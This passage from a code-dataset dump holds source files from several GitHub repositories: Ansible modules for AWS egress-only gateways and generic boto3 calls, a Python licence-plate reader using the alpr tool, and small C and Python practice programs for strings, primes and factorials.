\"\"\"\n Delete EIGW\n\n module : AnsibleModule object\n client : boto3 client connection object\n eigw_id : ID of the EIGW to delete\n \"\"\"\n\n try:\n response = client.delete_egress_only_internet_gateway(DryRun=module.check_mode, EgressOnlyInternetGatewayId=eigw_id)\n except ClientError as err:\n # When boto3 method is run with DryRun=True it returns an error on success\n # We need to catch the error and return something valid\n if err.response.get('Error').get('Code') == \"DryRunOperation\":\n return {'changed': True, 'gateway_id': None}\n else:\n module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))\n\n return {'changed': response['ReturnCode']}\n\n\[email protected]()\ndef create_eigw(module, client, vpc_id):\n \"\"\"\n Create EIGW\n\n module : AnsibleModule object\n client : boto3 client connection object\n vpc_id : ID of the VPC we are operating on\n \"\"\"\n\n try:\n response = client.create_egress_only_internet_gateway(DryRun=module.check_mode, VpcId=vpc_id)\n eigw = response['EgressOnlyInternetGateway']\n except ClientError as err:\n # When boto3 method is run with DryRun=True it returns an error on success\n # We need to catch the error and return something valid\n if err.response.get('Error').get('Code') == \"DryRunOperation\":\n return {'changed': True, 'gateway_id': None}\n else:\n module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))\n\n # We loop through the Attachments list in boto3 response to make sure the EIGW is fully attached before returning\n state = eigw['Attachments'][0]['State']\n if state == 'attached':\n # EIGW is fully attached so we return immediately\n return {'changed': True, 'gateway_id': eigw['EgressOnlyInternetGatewayId']}\n elif state == 'attaching':\n # EIGW is still attaching so we check status\n retries = 5\n pause = 1\n while retries > 0:\n retries = retries - 1\n sleep(pause)\n try:\n check_resp = client.describe_egress_only_internet_gateways(EgressOnlyInternetGatewayIds=eigw['EgressOnlyInternetGatewayId'])\n except ClientError as err:\n module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))\n\n if check_resp['EgressOnlyInternetGateways'][0]['Attachments'][0]['State'] == 'attached':\n return {'changed': True, 'gateway_id': eigw['EgressOnlyInternetGatewayId']}\n pause = pause * 2\n else:\n # EIGW gave back a bad attachment state so we error out\n module.fail_json(msg='Unable to create and attach Egress Only Internet Gateway to VPCId: {0}. Bad Attachment State: {1}'.format(vpc_id, state))\n\n\[email protected]()\ndef describe_eigws(module, client, vpc_id):\n \"\"\"\n Describe EIGWS\n\n module : AnsibleModule object\n client : boto3 client connection object\n vpc_id : ID of the VPC we are operating on\n \"\"\"\n\n try:\n response = client.describe_egress_only_internet_gateways()\n except ClientError as err:\n module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))\n\n if len(response['EgressOnlyInternetGateways']) == 0:\n return None\n\n for eigw in response['EgressOnlyInternetGateways']:\n attached_vpc = eigw['Attachments'][0]['VpcId']\n state = eigw['Attachments'][0]['State']\n if attached_vpc == vpc_id and state in ('attached', 'attaching'):\n return eigw['EgressOnlyInternetGatewayId']\n else:\n return None\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n argument_spec.update(dict(\n vpc_id=dict(required=True),\n state=dict(default='present', choices=['present', 'absent'])\n ))\n\n module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)\n\n if not HAS_BOTO3:\n module.fail_json(msg='boto3 is required for this module')\n\n try:\n region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)\n client = boto3_conn(module, conn_type='client', resource='ec2', **aws_connect_params)\n except ClientError as err:\n module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))\n\n vpc_id = module.params.get('vpc_id')\n state = module.params.get('state')\n\n eigw_id = describe_eigws(module, client, vpc_id)\n\n result = dict(\n changed=False,\n gateway_id=eigw_id\n )\n\n if state == 'present' and not eigw_id:\n result = create_eigw(module, client, vpc_id)\n elif state == 'absent' and eigw_id:\n result = delete_eigw(module, client, eigw_id)\n\n module.exit_json(**result)\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.8309859037399292, "alphanum_fraction": 0.8309859037399292, "avg_line_length": 34.5, "blob_id": "d636d800027ea742919479665153238f7193bbad", "content_id": "22d6a6a6ed11ac1e60dbf9928524c443fa7e1863", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 71, "license_type": "no_license", "max_line_length": 45, "num_lines": 2, "path": "/README.md", "repo_name": "shepdelacreme/ansible-custom-modules", "src_encoding": "UTF-8", "text": "# ansible-custom-modules\nCustom modules developed for use with Ansible\n" }, { "alpha_fraction": 0.6412017941474915, "alphanum_fraction": 0.653313159942627, "avg_line_length": 33.48594284057617, "blob_id": "bfa4c1c2cbb262e2a4e3d3304e3d4c7af9c7109c", "content_id": "7aa87c4889e1d31f2326a904afe3ac0cd6eb8422", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8587, "license_type": "no_license", "max_line_length": 158, "num_lines": 249, "path": "/library/boto3_generic.py", "repo_name": "shepdelacreme/ansible-custom-modules", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#\n# This is a free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This Ansible library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this library. If not, see <http://www.gnu.org/licenses/>.\n\nANSIBLE_METADATA = {'metadata_version': '1.0',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: boto3_generic\nshort_description: Generic interface to boto3\ndescription:\n - Manage an AWS VPC Egress Only Internet gateway\nversion_added: \"2.4\"\nauthor:\n - \"Daniel Shepherd (@shepdelacreme)\"\nrequirements:\n - boto3\n - botocore\noptions:\n service:\n description:\n - The AWS service you want to access with boto3. The service name must match the definitions in the boto3 docs.\n - Example ec2, s3, cloudtrail, etc\n - See U(http://boto3.readthedocs.io/en/latest/reference/services/index.html)\n required: true\n conn_type:\n description:\n - The type of boto3 connection to create.\n - boto3 provides a low-level 'client' interface as well as a higher level 'resource' interface that abstracts some functionality.\n default: client\n choices: [ 'client', 'resource' ]\n operation_name:\n description:\n - The method or name of the operation of the boto3 client/resource to use. This needs to be specified as documented in the boto3 docs or the AWS CLI/API\n - Both the Camel Case and Snake Case version of the name is accepted here.\n - See U(http://boto3.readthedocs.io/en/latest/reference/services/index.html)\n required: true\n arguments:\n description:\n - Complex arguments to pass to the boto3 service method specified above.\n aliases: args\nextends_documentation_fragment:\n - aws\n'''\n\nEXAMPLES = '''\n# Note: These examples do not set authentication details, see the AWS Guide for details.\n\n# Grab info for all VPCs and register output for later consumption\nboto3_generic:\n service: ec2\n conn_type: client\n operation_name: describe_vpcs\n args:\n VpcIds: vpc-83cce1e6\nregister: vpcs\n\n'''\n\nRETURN = '''\nresponse:\n description: The response from boto3 converted to snake dict.\n returned: always\n type: complex\n sample: hash/dictionary returned by boto3 low-level client\n contains:\n response_metadata:\n description: hash/dictionary with the parsed HTTP response\n returned: always\n type: dict\n contains:\n http_headers:\n description: HTTP headers from the response parsed out\n type: dict\n contains:\n content_type:\n description: HTTP content-type\n returned: always\n sample: \"text/html;charset=UTF-8\"\n date:\n description: Date of request\n returned: always\n sample: \"Tue, 25 Apr 2017 17:40:43 GMT\"\n server:\n description: HTTP server type\n returned: always\n sample: \"AmazonEC2\"\n transer-encoding:\n description: Transer encoding header\n returned: always\n sample: \"chunked\"\n vary:\n description: don't know\n returned: always\n sample: \"Accept-Encoding\"\n http_status_code:\n description: The HTTP status code of the response\n returned: always\n sample: 200\n request_id:\n description: The unique request id assigned to the request\n returned: always\n sample: c646d2d2-29e0-11e7-93ae-92361f002671\n retry_attemps:\n description: The number of times the request was retried\n returned: always\n sample: 0\n other:\n description: This is a boto3 operation specific object that is returned. Consult the boto3 documentation for the operation being invoked.\n - The name will not be \"other\" and is specific to the operation.\n - This is typically a list of dicts or a single dict.\n returned: sometimes\n sample: This is a complex type, usually a list of dicts or a dict.\n'''\n\n\nimport traceback\nimport re\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.ec2 import (\n boto3_conn,\n ec2_argument_spec,\n get_aws_connection_info,\n AWSRetry,\n HAS_BOTO3,\n boto3_tag_list_to_ansible_dict,\n camel_dict_to_snake_dict,\n ansible_dict_to_boto3_filter_list\n)\nfrom botocore.session import Session\nfrom botocore.exceptions import ClientError\n\n\ndef camel_to_snake(name):\n\n first_cap_re = re.compile('(.)([A-Z][a-z]+)')\n all_cap_re = re.compile('([a-z0-9])([A-Z])')\n s1 = first_cap_re.sub(r'\\1_\\2', name)\n\n return all_cap_re.sub(r'\\1_\\2', s1).lower()\n\n\ndef call_boto3_operation(module, conn, operation_name, args):\n\n try:\n boto3_call = getattr(conn, operation_name)\n response = camel_dict_to_snake_dict(boto3_call(**args))\n except ClientError as err:\n # When boto3 method is run with DryRun=True it returns an error on success\n # We need to catch the error and return something valid\n if err.response.get('Error').get('Code') == \"DryRunOperation\":\n return {'changed': True}\n else:\n return camel_dict_to_snake_dict(err.response)\n\n return response\n\n\ndef validate_params(module, service, operation_name, args, **awsparams):\n profile = awsparams.get('profile_name')\n\n session = Session(profile=profile)\n\n if service not in session.get_available_services():\n module.fail_json(msg='Invalid Service Name: {0}'.format(service))\n\n service_model = session.get_service_model(service)\n op_names = list(service_model.operation_names)\n if operation_name not in op_names:\n module.fail_json(msg='Invalid Operation Name: {0} for Service: {1}'.format(operation_name, service))\n\n op_model = service_model.operation_model(operation_name)\n shape_members = dict(op_model.input_shape.members)\n required_members = list(op_model.input_shape.required_members)\n\n if 'DryRun' not in shape_members:\n args.pop('DryRun')\n\n bad_params = set(args.keys()) - set(shape_members.keys())\n if bad_params:\n module.fail_json(msg='Invalid Argument(s): {0} for Service Operation: {1}'.format(\", \".join(bad_params), operation_name))\n\n missing_params = set(required_members) - set(args.keys())\n if missing_params:\n module.fail_json(msg='Missing Required Argument(s): {0} for Service Operation: {1}'.format(\", \".join(missing_params), operation_name))\n\n return args\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n argument_spec.update(dict(\n arguments=dict(aliases=['args'], default=dict(), type='dict'),\n service=dict(required=True),\n conn_type=dict(default='client', choices=['client', 'resource']),\n operation_name=dict(required=True)\n ))\n\n module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)\n\n if not HAS_BOTO3:\n module.fail_json(msg='boto3 is required for this module')\n\n if isinstance(module.params['arguments'], dict):\n args = module.params['arguments']\n else:\n args = dict()\n\n service = module.params['service']\n conn_type = module.params['conn_type']\n operation_name = module.params['operation_name']\n\n args['DryRun'] = module.check_mode\n\n if args.get('Filters'):\n args['Filters'] = ansible_dict_to_boto3_filter_list(args['Filters'])\n\n result = dict(\n changed=False\n )\n\n try:\n region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)\n args = validate_params(module, service, operation_name, args, **aws_connect_params)\n conn = boto3_conn(module, conn_type=conn_type, resource=service, **aws_connect_params)\n except ClientError as err:\n module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))\n\n result['response'] = call_boto3_operation(module, conn, camel_to_snake(operation_name), args)\n\n module.exit_json(**result)\n\n\nif __name__ == '__main__':\n main()\n" } ]
3
SaleelS/parkcam
https://github.com/SaleelS/parkcam
0dfc96719a88aeb31e145bd35c9dacd6f87065ae
24bcd691b4023f3ef5c3def99a69756f38bff62b
d774a6e5bfa7b22e6b7b024356937f6434212ed1
refs/heads/master
2021-01-19T00:12:37.650525
2015-08-07T01:53:21
2015-08-07T01:53:21
40,335,492
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5514354109764099, "alphanum_fraction": 0.559808611869812, "avg_line_length": 25.410526275634766, "blob_id": "ab885ac11b53752f370b1858b9b2c3d8901d32fb", "content_id": "419c0a72b5ae724a9f29042c904dba0affd361d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2508, "license_type": "no_license", "max_line_length": 68, "num_lines": 95, "path": "/parking.py", "repo_name": "SaleelS/parkcam", "src_encoding": "UTF-8", "text": "import gspread\nfrom difflib import SequenceMatcher\nimport subprocess\nimport json\nimport sys\nimport shlex\nfrom openpyxl import load_workbook\n\nclass PlateReader:\n #@param carImage is a filename string\n #DONT UNFOLD contains pw lol\n def __init__(self):\n self.gdoc = self.getGdoc()\n def alpr_subprocess(self):\n alpr_args = shlex.split(self.alpr_command_args)\n return subprocess.Popen(alpr_args, stdout = subprocess.PIPE)\n\n def alpr_json_results(self):\n alpr_out, alpr_error = self.alpr_subprocess().communicate()\n\n if not alpr_error is None:\n return None, alpr_error\n elif \"No license plates found.\" in alpr_out:\n return None, None\n\n try:\n return json.loads(alpr_out), None\n except ValueError, e:\n return None, e\n\n\n def read_plate(self,image):\n self.alpr_command_args = \"alpr -j \" + image\n alpr_json, alpr_error = self.alpr_json_results()\n\n if not alpr_error is None:\n print alpr_error\n return\n\n if alpr_json is None:\n print \"No results!\"\n return\n\n results = alpr_json[\"results\"][0]\n return results['plate']\n\n def getGdoc(self):\n \"\"\"\n parkerC = gspread.Client(self.auth)\n parkerC.login()\n parkerS = parkerC.open_by_key(\"18pus8l5KnrdThVcTrylR3Zvj1Pmgs8L8QocJACImFTU\")\n parker = parkerS.get_worksheet(0)\n return parker\n \"\"\"\n wb = load_workbook('parking.xlsx')\n return wb.get_sheet_by_name(\"Sheet1\")\n\n def getRowbyPlate(self,plate):\n parker = self.gdoc\n plates = [a[0].value for a in parker[\"D2:D257\"]]\n names = [a[0].value for a in parker[\"A2:A257\"]]\n #print plates\n maxMatch = 0\n matchIdx = -1\n for i in range(len(plates)):\n if plates[i] is None:\n continue\n matcher = SequenceMatcher(None,plates[i],plate)\n mp = matcher.ratio()\n if mp > maxMatch:\n matchIdx = i\n maxMatch = mp\n if maxMatch > 0.5:\n print matchIdx\n return names[matchIdx]\n else:\n return None\n\ndef __main__():\n args = sys.argv[1:]\n if len(sys.argv) != 2:\n print(\"please enter an image to process\")\n exit(1)\n else:\n pr = PlateReader()\n plate = pr.read_plate(args[0])\n print(pr.getRowbyPlate(plate))\n\n\n\ndef readPlate(carImageFile):\n subprocess\n\nif __name__ == \"__main__\":\n __main__()" } ]
1
kowshid/Practice-Problems
https://github.com/kowshid/Practice-Problems
f494d7db3c4c7814d8d376bc166938444b777f0a
7079ac4186a406261bb71be5a6b356da70f3c283
7f2910c60fb168780984d4d3f720fbb318446faf
refs/heads/master
2023-04-05T20:15:27.264497
2021-03-10T05:29:32
2021-03-10T05:29:32
315,970,738
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.3262679874897003, "alphanum_fraction": 0.3451930284500122, "avg_line_length": 18.71641731262207, "blob_id": "5ca8ef2696d4366b6a7f43507c0045fc06e1d50c", "content_id": "508672d997902a3825e9597a1bf7f8c737fb5d19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1321, "license_type": "no_license", "max_line_length": 50, "num_lines": 67, "path": "/Word reversals of a given string.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\n Input: 2T lines:\n a string str\n Output:\n print each word of the string in reverse order\n*/\n\n#include <stdio.h>\n#include <string.h>\n\nvoid printReverse(char str[])\n{\n int len = strlen(str) - 1;\n for(int i = len; i >= 0; i--)\n printf(\"%c\", str[i]);\n printf(\" \");\n}\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, len, j;\n char str[1001], word[1001];\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int k = 0; k < T; k++)\n {\n j = 0;\n fscanf(fptr, \" %[^\\n]\", str);\n //printf(\"%s\\n\", str);\n len = strlen(str);\n\n for(int i = 0; str[i]; i++)\n {\n if(str[i] != ' ')\n {\n word[j] = str[i];\n j++;\n }\n else if(j > 0)\n {\n word[j] = '\\0';\n printReverse(word);\n j = 0;\n }\n }\n if(j > 0)\n {\n word[j] = '\\0';\n printReverse(word);\n }\n\n printf(\"\\n\");\n }\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.3506825864315033, "alphanum_fraction": 0.3831058144569397, "avg_line_length": 16.477611541748047, "blob_id": "e9b2745404acd2801f1081097c7086351cb7e492", "content_id": "ef089b99e51cd49e69bfd3366ee688c5bc255fb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1172, "license_type": "no_license", "max_line_length": 56, "num_lines": 67, "path": "/prime using sieve.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "\n/*\n input:\n T lines containing low < up\n output:\n all primes in range [a, b]\n*/\n\n#include <stdio.h>\n#include <math.h>\n\nint up = 100000;\n\nint main()\n{\n FILE *fptr;\n fptr = fopen(\"D:\\\\input.txt\", \"r\");\n\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, lo, hi, limit = sqrt(up), count;\n char str[10001], *temp, input[10001], output[10001];\n char delim[] = \" .,!?;:\";\n int arr[up + 1];\n\n fscanf(fptr, \"%d\", &T);\n\n if(T <= 0 || T > 100)\n {\n printf(\"Input Error!\");\n exit(1);\n }\n\n for(int i = 2; i <= up; i++)\n {\n arr[i] = 1; //1 denoted its a prime number\n }\n\n for(int i = 2; i <= limit; i++)\n {\n if(arr[i] == 1)\n {\n for(int j = 2; i*j <= up; j++)\n arr[i*j] = 0;\n }\n }\n\n for (int k = 0; k < T; k++)\n {\n count = 0;\n fscanf(fptr, \"%d%d\", &lo, &hi);\n for(int i = lo; i <= hi; i++)\n {\n if(arr[i])\n {\n count++;\n printf(\"%d \", i);\n }\n }\n printf(\"\\nTotal = %d\\n\", count);\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.4586776793003082, "alphanum_fraction": 0.4889807105064392, "avg_line_length": 24.068965911865234, "blob_id": "cb94c59b9c03a49b1028bdc0ecf62ed9fb3731b2", "content_id": "e7a41f6c14671306251bd41c810fed0c0dbccc12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 726, "license_type": "no_license", "max_line_length": 73, "num_lines": 29, "path": "/isomorphic Strings.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "def isomorphic(str1, str2):\n len1 = len(str1)\n len2 = len(str2)\n\n if len1 != len2:\n return False\n\n visited = [False] * 26\n mapping = [-1] * 26\n\n for i in range(len1):\n if mapping[ord(str1[i]) - ord('a')] == -1:\n if visited[ord(str2[i]) - ord('a')] == True:\n return False\n\n mapping[ord(str1[i]) - ord('a')] = ord(str2[i]) - ord('a')\n visited[ord(str2[i]) - ord('a')] = True\n\n elif mapping[ord(str1[i]) - ord('a')] != ord(str2[i]) - ord('a'):\n return False\n return True\n\ndef main():\n print(\"ahsan\", \"kowshid\")\n print(isomorphic(\"ahsan\", \"waqar\"))\n print(isomorphic(\"aab\", \"xxy\"))\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.44606414437294006, "alphanum_fraction": 0.4693877696990967, "avg_line_length": 20.41666603088379, "blob_id": "5bcbd41d6d1757608e8720f02404b1cd1cf9f138", "content_id": "e8ee5ebc252abc3b666141ea33c07fc6fe149203", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1029, "license_type": "no_license", "max_line_length": 77, "num_lines": 48, "path": "/cricket run rate.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//\n\n/*\n Input: T lines each having opposition runs, current runs, balls remaining\n Output:\n CRR, RRR\n*/\n\n#include <stdio.h>\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T;\n double target, score, ballsRemaining, CRR, RRR;\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \"%lf%lf%lf\", &target, &score, &ballsRemaining);\n if(target < score || ballsRemaining > 300.0)\n {\n printf(\"input error\\n\");\n continue;\n }\n\n target = target + 1.0;\n\n CRR = 6.0 * score / (300.0 - ballsRemaining);\n RRR = 6.0 * (target - score) / ballsRemaining;\n\n printf(\"Case %d: %.2lf %.2lf\\n\", i + 1, CRR, RRR);\n }\n //printed list is unsorted\n printf(\"\\n\");\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.44897958636283875, "alphanum_fraction": 0.4656771719455719, "avg_line_length": 15.333333015441895, "blob_id": "0339663b8eb1dbfd2e7a3321e7656b2953f8664e", "content_id": "316e6a951e9917841b1de723d10a30c3dc6043d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 539, "license_type": "no_license", "max_line_length": 48, "num_lines": 33, "path": "/Add digits of a number.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\nInput: T numbers of variable lenght\nOutput: add the RMD and LMD\n*/\n\n#include <stdio.h>\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, n, num, RSD;\n fscanf(fptr, \"%d\", &T);\n\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \"%d\", &num);\n RSD = num % 10;\n\n while(num >= 10)\n num /= 10;\n\n printf(\"%d\\n\", RSD + num);\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.3595854938030243, "alphanum_fraction": 0.37823835015296936, "avg_line_length": 18.67346954345703, "blob_id": "bb95cd066ffa30e707283cb49231f4e129221375", "content_id": "18671d621069b6022d631f9e98dc3d106c4c0c0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 965, "license_type": "no_license", "max_line_length": 74, "num_lines": 49, "path": "/word count in a given string.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\n Input: 2T lines:\n a string str only containing space\n Output:\n word count in str\n*/\n\n#include <stdio.h>\n#include <string.h>\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, count;\n char str[1001], word[1001];\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int k = 0; k < T; k++)\n {\n count = 1;\n fscanf(fptr, \" %[^\\n]\", str);\n //printf(\"%s\\n\", str);\n\n for(int i = 0; str[i]; i++)\n {\n if(str[i] == ' ')\n {\n while(str[i] == ' ') //if contains more than one space\n i++;\n count++;\n }\n }\n\n printf(\"%s --> %d\\n\", str, count);\n }\n printf(\"\\n\");\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.33572283387184143, "alphanum_fraction": 0.3715651035308838, "avg_line_length": 16.39583396911621, "blob_id": "8f3e6286476e00fe3a401923d92ddbf8a22fbadb", "content_id": "5e26561ada316f9f487716b5ac807de07b663af5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 837, "license_type": "no_license", "max_line_length": 48, "num_lines": 48, "path": "/Zero count of factorial.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "\n//\n\n/*\n Input: T numbers where 0 <= n <= 100\n Output:\n zero (0) at the end\n*/\n\n#include <stdio.h>\nint arr[101];\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, n, count;\n arr[0] = 0;\n for(int i = 1; i < 101; i++)\n {\n if(i % 25 == 0)\n arr[i] = 2;\n else if(i % 5 == 0)\n arr[i] = 1;\n }\n\n fscanf(fptr, \"%d\", &T);\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n count = 0;\n fscanf(fptr, \"%d\", &n);\n for(int j = 0; j <= n; j++)\n count += arr[j];\n\n printf(\"%d --> %d\\n\", n, count);\n }\n printf(\"\\n\");\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.4315352737903595, "alphanum_fraction": 0.4522821605205536, "avg_line_length": 17.576923370361328, "blob_id": "a99fd10f01f72e0171a4259b3e046c7df77525e6", "content_id": "586afd331cc69366c764fe60ccae5def5bbaaf30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 482, "license_type": "no_license", "max_line_length": 43, "num_lines": 26, "path": "/Prime Factors.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "import math\n\nprime = None\n\ndef sieve(n):\n global prime\n prime = [True] * (n+1)\n for i in range(2, int(math.sqrt(n))+1):\n j = 2\n if prime[i]:\n while(i*j <= n):\n prime[i*j] = False\n j += 1\n\ndef primeFactors(n):\n factors = []\n sieve(n)\n itr = 2\n while itr <= n:\n if prime[itr]:\n if n % itr == 0:\n factors.append(itr)\n itr += 1\n return factors\n\nprint(primeFactors(17))" }, { "alpha_fraction": 0.3576779067516327, "alphanum_fraction": 0.37172284722328186, "avg_line_length": 18.77777862548828, "blob_id": "6a72f48d268b597a65436ed6b1b282ad02e6aa96", "content_id": "e469b2e9a923973f4662ad998b035d4aec24e81c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1068, "license_type": "no_license", "max_line_length": 97, "num_lines": 54, "path": "/vowel consonant 1.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\n input:\n T lines of string\n output:\n print vowels and consonants separately\n*/\n\n#include <stdio.h>\n#include <ctype.h>\n\nint main()\n{\n FILE *fptr;\n fptr = fopen(\"D:\\\\input.txt\", \"r\");\n\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T;\n char str[10001];\n\n fscanf(fptr, \"%d\", &T);\n printf(\" T = %d\\n\", T);\n\n if(T <= 0 || T > 100)\n {\n printf(\"Input Error!\");\n exit(1);\n }\n\n for (int k = 0; k < T; k++)\n {\n fscanf(fptr, \" %[^\\n]\", str);\n //printf(\"%s\\n\", str);\n for(int i = 0; str[i]; i++)\n {\n str[i] = tolower(str[i]);\n if(str[i] == 'a' || str[i] == 'e' || str[i] == 'i' || str[i] == 'o' || str[i] == 'u')\n printf(\"%c\", str[i]);\n }\n printf(\"\\n\");\n for(int i = 0; str[i]; i++)\n {\n if(str[i] != 'a' && str[i] != 'e' && str[i] != 'i' && str[i] != 'o' && str[i] != 'u')\n printf(\"%c\", str[i]);\n }\n printf(\"\\n\");\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.4092009663581848, "alphanum_fraction": 0.4285714328289032, "avg_line_length": 15.15686321258545, "blob_id": "af74fe137972cfb20ba8d63e38e8eaccf36c8572", "content_id": "dfc2dba24d660f9628a2071366e143daf1927eeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 826, "license_type": "no_license", "max_line_length": 51, "num_lines": 51, "path": "/factorial.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\n Input: T numbers where 0 <= n <= 15\n Output:\n factorial(n)\n*/\n\n#include <stdio.h>\n\nint up = 15;\nint low = 0;\n\nlong long int factorial(int n)\n{\n if(n >= low && n <= up)\n {\n long long int result = 1;\n for(int i = 1; i <= n; i++)\n result *= i;\n\n return result;\n }\n\n return -1;\n}\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, n;\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \"%d\", &n);\n printf(\"%d! = %lld\\n\",n, factorial(n));\n }\n //printed list is unsorted\n printf(\"\\n\");\n }\n\n return 0;\n}\n\n\n" }, { "alpha_fraction": 0.49789029359817505, "alphanum_fraction": 0.5400843620300293, "avg_line_length": 17.30769157409668, "blob_id": "1e6256621d05943c6672867328d755e581d3c47b", "content_id": "b0e1002df187601ff5610785832f7d9578e23dde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 40, "num_lines": 13, "path": "/Int to String.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "def intToString(n):\n temp = n\n strarr = []\n while(temp):\n char = chr(temp % 10 + ord('0'))\n strarr.append(char)\n temp = temp // 10\n\n strarr.reverse()\n\n return \"\".join(strarr)\n\nprint(intToString(41413))" }, { "alpha_fraction": 0.4576023519039154, "alphanum_fraction": 0.4736842215061188, "avg_line_length": 16.075000762939453, "blob_id": "53e0f4164a0853bb9f3395d5cb994814d8e41075", "content_id": "a61562052b8cbc5b4f9ecac3280c3eccdc3de555", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 684, "license_type": "no_license", "max_line_length": 43, "num_lines": 40, "path": "/balanced parentheses.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//a try by kowshid\n//#include <bits/stdc++.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\nusing namespace 